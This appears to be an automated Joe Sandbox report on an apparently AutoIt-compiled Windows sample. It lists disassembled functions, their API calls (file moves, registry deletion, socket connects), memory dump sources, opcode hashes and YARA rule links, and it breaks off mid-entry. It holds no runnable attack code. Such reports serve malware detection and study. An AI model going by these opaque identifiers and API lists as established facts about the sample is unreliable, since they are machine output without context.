                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _wcsncpy$LocalTime
                                                                        • String ID:
                                                                        • API String ID: 2945705084-0
                                                                        • Opcode ID: 5e2f6709333d5e8fcee2559c5a12b5c3577a70ab8d6971e1af4dc9a0e8e6345b
                                                                        • Instruction ID: 977f5c2f37b5cd69cf49788f9d18f529d1aceadca360168bb2cd18df4f6a4202
                                                                        • Opcode Fuzzy Hash: 5e2f6709333d5e8fcee2559c5a12b5c3577a70ab8d6971e1af4dc9a0e8e6345b
                                                                        • Instruction Fuzzy Hash: 92418365C11618B6CB11FBB88C469DFB7B8FF04310F509956E618E3222EA34A255C7E7
                                                                        Function 008F3671 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 111filestringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008F466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,008F3697,?), ref: 008F468B
                                                                          • Part of subcall function 008F466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,008F3697,?), ref: 008F46A4
                                                                        • lstrcmpiW.KERNEL32(?,?), ref: 008F36B7
                                                                        • _wcscmp.LIBCMT ref: 008F36D3
                                                                        • MoveFileW.KERNEL32(?,?), ref: 008F36EB
                                                                        • _wcscat.LIBCMT ref: 008F3733
                                                                        • SHFileOperationW.SHELL32(?), ref: 008F379F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                        • String ID: \*.*
                                                                        • API String ID: 1377345388-1173974218
                                                                        • Opcode ID: 38d0ae7c4d962237b7b3693b3e52f16bf7b22585094e84c13ab4c65d31a6b877
                                                                        • Instruction ID: e6a507f698f7d87e6f84a1dd1d2eaec6c70268ef72b39463b8cd04170ee1409c
                                                                        • Opcode Fuzzy Hash: 38d0ae7c4d962237b7b3693b3e52f16bf7b22585094e84c13ab4c65d31a6b877
                                                                        • Instruction Fuzzy Hash: 63417E71508348AAC752EF78C4419EFB7E8FF89380F00092EB59AC3251EA34D689C752
                                                                        Function 00917291 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 103windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 009172AA
                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00917351
                                                                        • IsMenu.USER32(?), ref: 00917369
                                                                        • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 009173B1
                                                                        • DrawMenuBar.USER32 ref: 009173C4
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Menu$Item$DrawInfoInsert_memset
                                                                        • String ID: 0
                                                                        • API String ID: 3866635326-4108050209
                                                                        • Opcode ID: 765911cc424f400f3960e2e2bd11c287b5766190a566865bd238dd91f1bc322a
                                                                        • Instruction ID: 72cf03d97c0905b7600a1a8133e7b92f5f8db7d1877358b01efe124ae2c7107e
                                                                        • Opcode Fuzzy Hash: 765911cc424f400f3960e2e2bd11c287b5766190a566865bd238dd91f1bc322a
                                                                        • Instruction Fuzzy Hash: 15411A75A04209EFDB20DF94E884AEABBF9FB08350F148529FD2597250D730AD91EF60
                                                                        Function 00910FA5 Relevance: 10.6, APIs: 7, Instructions: 101registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00910FD4
                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00910FFE
                                                                        • FreeLibrary.KERNEL32(00000000), ref: 009110B5
                                                                          • Part of subcall function 00910FA5: RegCloseKey.ADVAPI32(?), ref: 0091101B
                                                                          • Part of subcall function 00910FA5: FreeLibrary.KERNEL32(?), ref: 0091106D
                                                                          • Part of subcall function 00910FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00911090
                                                                        • RegDeleteKeyW.ADVAPI32(?,?), ref: 00911058
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                        • String ID:
                                                                        • API String ID: 395352322-0
                                                                        • Opcode ID: 4b495883c507e3e769459f8ba1102ef4bf14e94797b3b218f402b011e434f381
                                                                        • Instruction ID: 229bbbad06ec50477e20989b1227df68bdda20f569dda9af20105f3b30c3d55b
                                                                        • Opcode Fuzzy Hash: 4b495883c507e3e769459f8ba1102ef4bf14e94797b3b218f402b011e434f381
                                                                        • Instruction Fuzzy Hash: 1A31FB71E1510DBFDB25DB90DC99AFEB7BCEF08300F004169E606A2151EB759EC59AA0
                                                                        Function 009162CD Relevance: 10.6, APIs: 7, Instructions: 99windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 009162EC
                                                                        • GetWindowLongW.USER32(014C4A20,000000F0), ref: 0091631F
                                                                        • GetWindowLongW.USER32(014C4A20,000000F0), ref: 00916354
                                                                        • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00916386
                                                                        • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 009163B0
                                                                        • GetWindowLongW.USER32(00000000,000000F0), ref: 009163C1
                                                                        • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 009163DB
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: LongWindow$MessageSend
                                                                        • String ID:
                                                                        • API String ID: 2178440468-0
                                                                        • Opcode ID: 0ddf4131c02329b8eea1d5e21d51ccacc413dd548965cc705999f4ec5385a371
                                                                        • Instruction ID: 6d389c6ede40651f73b45d8013f2138586de25dc4e6285ae6c0b1c4f5a7e6008
                                                                        • Opcode Fuzzy Hash: 0ddf4131c02329b8eea1d5e21d51ccacc413dd548965cc705999f4ec5385a371
                                                                        • Instruction Fuzzy Hash: 4C313730B082499FDB20CF19DC94F943BE5FB4A755F1941A8F6218F2B2CB71A881EB50
                                                                        Function 008EDAEB Relevance: 10.6, APIs: 7, Instructions: 95memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?), ref: 008EDB2E
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?), ref: 008EDB54
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 008EDB57
                                                                        • SysAllocString.OLEAUT32(?), ref: 008EDB75
                                                                        • SysFreeString.OLEAUT32(?), ref: 008EDB7E
                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,?), ref: 008EDBA3
                                                                        • SysAllocString.OLEAUT32(?), ref: 008EDBB1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: d91efd80fa7065bd5766df9df8dc02d0807fc223fa1c7579483776f8798b08b3
                                                                        • Instruction ID: 18e4d4c9632b0ec9780b724be5dcd812deda98ea07be91ea2c9c9a74d535a818
                                                                        • Opcode Fuzzy Hash: d91efd80fa7065bd5766df9df8dc02d0807fc223fa1c7579483776f8798b08b3
                                                                        • Instruction Fuzzy Hash: 46217C36604219AFAB10DFA9DC88CFB73ACFB4A360B058565FD15DB2A0E6709C459B60
                                                                        Function 00906173 Relevance: 10.6, APIs: 7, Instructions: 94networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00907D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00907DB6
                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 009061C6
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 009061D5
                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0090620E
                                                                        • connect.WSOCK32(00000000,?,00000010), ref: 00906217
                                                                        • WSAGetLastError.WSOCK32 ref: 00906221
                                                                        • closesocket.WSOCK32(00000000), ref: 0090624A
                                                                        • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00906263
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                        • String ID:
                                                                        • API String ID: 910771015-0
                                                                        • Opcode ID: 72acbccc1300af6bf0c3d6500124dbfe4a1e5e1664f7287c53d39dbc9f93bfcb
                                                                        • Instruction ID: c53b41bfbe0e472aaca11161d0dc72b54b798efee0f555fbb2965dd638bf174f
                                                                        • Opcode Fuzzy Hash: 72acbccc1300af6bf0c3d6500124dbfe4a1e5e1664f7287c53d39dbc9f93bfcb
                                                                        • Instruction Fuzzy Hash: 7F31BE31604108AFDF10AF68CC85BBA7BACEF45760F048069F919E72D1DB74AC54DBA2
                                                                        Function 008EF65E Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __wcsnicmp
                                                                        • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                        • API String ID: 1038674560-2734436370
                                                                        • Opcode ID: e5fb44bfb96a183ee92027e93b2533144893bad840ec9a8a6251509d762842a6
                                                                        • Instruction ID: accdbfde732f0be3d44bdba69e04b550ca08e245456e9ef95e610d5c94c5f424
                                                                        • Opcode Fuzzy Hash: e5fb44bfb96a183ee92027e93b2533144893bad840ec9a8a6251509d762842a6
                                                                        • Instruction Fuzzy Hash: 152167722041E167D620A73AAC02EAB73D8FF67354F10403AF641C6162FF609D81C396
                                                                        Function 008EDBC4 Relevance: 10.6, APIs: 7, Instructions: 90memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,?,00000008), ref: 008EDC09
                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 008EDC2F
                                                                        • SysAllocString.OLEAUT32(00000000), ref: 008EDC32
                                                                        • SysAllocString.OLEAUT32(?), ref: 008EDC53
                                                                        • SysFreeString.OLEAUT32(?), ref: 008EDC5C
                                                                        • StringFromGUID2.OLE32(?,?,00000028,?,00000008), ref: 008EDC76
                                                                        • SysAllocString.OLEAUT32(?), ref: 008EDC84
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                        • String ID:
                                                                        • API String ID: 3761583154-0
                                                                        • Opcode ID: 96a356ba485e46ad3c76a53036197a6df95df4c09cd68729b93af96ab23cf497
                                                                        • Instruction ID: abec55bbaa8e59af02c3d17fc5919dfb2b5abad400c6543a34297b57c1cf365f
                                                                        • Opcode Fuzzy Hash: 96a356ba485e46ad3c76a53036197a6df95df4c09cd68729b93af96ab23cf497
                                                                        • Instruction Fuzzy Hash: 94215635608248AF9B10DFA9DC88DAB77ECFB09360B10C125F915CB3A1D674EC45DB64
                                                                        Function 008EF953 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 79windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00897DE1: _memmove.LIBCMT ref: 00897E22
                                                                        • _wprintf.LIBCMT ref: 008EFA17
                                                                          • Part of subcall function 00897BCC: _memmove.LIBCMT ref: 00897C06
                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 008EFA2E
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memmove$Message_wprintf
                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$^ ERROR
                                                                        • API String ID: 1837435165-916153598
                                                                        • Opcode ID: 181c0d8b39ff8411849ae222cad286639c3342bf318f801e3fcc11747cfee58c
                                                                        • Instruction ID: 2040b6ec7ff4ecddbcbca66564e256513aef912ed5598527579db3c5a56201dc
                                                                        • Opcode Fuzzy Hash: 181c0d8b39ff8411849ae222cad286639c3342bf318f801e3fcc11747cfee58c
                                                                        • Instruction Fuzzy Hash: 29211A3280410DAACF05FBA8DD52EEEBB34FF19315F640065F506B50A2EA212F19CB62
                                                                        Function 009175CD Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00891D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 00891D73
                                                                          • Part of subcall function 00891D35: GetStockObject.GDI32(00000011), ref: 00891D87
                                                                          • Part of subcall function 00891D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 00891D91
                                                                        • SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00917632
                                                                        • SendMessageW.USER32(?,00000409,00000000,FF000000), ref: 0091763F
                                                                        • SendMessageW.USER32(?,00000402,00000000,00000000), ref: 0091764A
                                                                        • SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00917659
                                                                        • SendMessageW.USER32(?,00000404,00000001,00000000), ref: 00917665
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend$CreateObjectStockWindow
                                                                        • String ID: Msctls_Progress32
                                                                        • API String ID: 1025951953-3636473452
                                                                        • Opcode ID: 3cb07ecc29178cd2f8f3bd1ad42d6f8f82911215355eb5a64cab0ceedc41ca4b
                                                                        • Instruction ID: a9f96c0388cd419f8c0ea1e8e06f2945df308bd4b00b6001e3e06b722686ade3
                                                                        • Opcode Fuzzy Hash: 3cb07ecc29178cd2f8f3bd1ad42d6f8f82911215355eb5a64cab0ceedc41ca4b
                                                                        • Instruction Fuzzy Hash: 6611B6B121421EBFEF119FA4CC85EEBBF6DEF08798F014114B604A2050C6729C61DBA4
                                                                        Function 008B9AE6 Relevance: 10.5, APIs: 7, Instructions: 45threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __init_pointers.LIBCMT ref: 008B9AE6
                                                                          • Part of subcall function 008B3187: EncodePointer.KERNEL32(00000000), ref: 008B318A
                                                                          • Part of subcall function 008B3187: __initp_misc_winsig.LIBCMT ref: 008B31A5
                                                                          • Part of subcall function 008B3187: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 008B9EA0
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 008B9EB4
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 008B9EC7
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 008B9EDA
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 008B9EED
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 008B9F00
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 008B9F13
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 008B9F26
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 008B9F39
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 008B9F4C
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 008B9F5F
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 008B9F72
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 008B9F85
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 008B9F98
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 008B9FAB
                                                                          • Part of subcall function 008B3187: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 008B9FBE
                                                                        • __mtinitlocks.LIBCMT ref: 008B9AEB
                                                                        • __mtterm.LIBCMT ref: 008B9AF4
                                                                          • Part of subcall function 008B9B5C: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,008B9AF9,008B7CD0,0094A0B8,00000014), ref: 008B9C56
                                                                          • Part of subcall function 008B9B5C: _free.LIBCMT ref: 008B9C5D
                                                                          • Part of subcall function 008B9B5C: DeleteCriticalSection.KERNEL32(0094EC00,?,?,008B9AF9,008B7CD0,0094A0B8,00000014), ref: 008B9C7F
                                                                        • __calloc_crt.LIBCMT ref: 008B9B19
                                                                        • __initptd.LIBCMT ref: 008B9B3B
                                                                        • GetCurrentThreadId.KERNEL32 ref: 008B9B42
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                        • String ID:
                                                                        • API String ID: 3567560977-0
                                                                        • Opcode ID: fda201f629febd76bcea7a71430987855f6a816df83fe393efd7ec4bad624385
                                                                        • Instruction ID: 4cc4aaac12b1bc8a0f236155b6492b50f70275d8d540af899ce8d441220d49e2
                                                                        • Opcode Fuzzy Hash: fda201f629febd76bcea7a71430987855f6a816df83fe393efd7ec4bad624385
                                                                        • Instruction Fuzzy Hash: A3F0903261D7216AE634B77DBC13ACA3694FF02734F244A29F6E4C63D2EF20944146A2
                                                                        Function 008B406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,008B3F85), ref: 008B4085
                                                                        • GetProcAddress.KERNEL32(00000000), ref: 008B408C
                                                                        • EncodePointer.KERNEL32(00000000), ref: 008B4097
                                                                        • DecodePointer.KERNEL32(008B3F85), ref: 008B40B2
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                        • String ID: RoUninitialize$combase.dll
                                                                        • API String ID: 3489934621-2819208100
                                                                        • Opcode ID: 5a8c8bd603de3dd49c12bf583e30637da9b7b915c3211ba74b0ca37c3d23b482
                                                                        • Instruction ID: a9001f04afdaf0bcebd99102a7198b532b96ceebcb695b43b42b4ad000d458d5
                                                                        • Opcode Fuzzy Hash: 5a8c8bd603de3dd49c12bf583e30637da9b7b915c3211ba74b0ca37c3d23b482
                                                                        • Instruction Fuzzy Hash: E4E092706ADB04ABEA50AF72EC19B853BA5B714787F508424F511E51A0CBB64605FB14
                                                                        Function 008F64B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
